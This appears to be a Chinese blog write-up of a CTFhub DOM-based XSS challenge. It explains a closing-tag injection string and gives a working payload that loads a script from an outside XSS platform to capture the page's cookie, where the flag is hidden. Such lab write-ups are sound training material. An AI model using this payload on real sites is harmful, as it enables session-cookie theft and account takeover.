XSS2-DOM反射(ctfhub)

一.题目链接:

https://www.ctfhub.com/#/skilltree

二.基础知识  

.1 DOM反射

  • 是什么?:DOM型和别的xss最大的区别就是他不经过服务器,仅仅是通过网页本身的javascript进行渲染触发的,我们可以观察,输入框的内容被发送到了哪?那个地方是不是可以被修改?从而插入自己的代码?
  • 如何利用:通过闭合源代码本身的script语句,插入新建的恶意代码语句,就可实现攻击
  • 举例';</script></textarea>'"<script src=这里换成自己熟练的xss平台上的恶意代码></script>
      1.'; --> 闭合js字符串
      2.</script> --> 闭合script标签
      3.</textarea> --> 闭合textarea标签
      4.'"> --> 闭合HTML属性
      这里使用这么多闭合标签是为了把所有的情况都考虑在内

三.开始解题

1.阅读源代码,我们发现关键位置,其中'CTFhub is very niubility' 是我们可控的范围,于是构造闭合标签

';</script></textarea>'"<script src=这里换成自己熟练的xss平台上的恶意代码></script>

#主波这里的playload如下,用的是https://d00.cc/这个xss平台
';</script></textarea>'"><script src=//xs.pe/QK7></script>

//如果有伙伴不懂xss平台使用教程,移步这篇文章
https://www.cnblogs.com/sun010/articles/18822541

2.接下来我们把恶意代码输入框中,点击提交,再把上面的url复制到第二个框内,点击提交,回到自己的XSS页面刷新等待答案就好啦,flag藏在cookie那一行

五.思路总结

了解DOM反射型的漏洞特点 -->
查看源码,是否有被控制的地方,闭合原来的代码,script自己的恶意代码 -->
回到xss平台查看cookie

posted @ 2025-04-15 14:08  sun010  阅读(57)  评论(0)    收藏  举报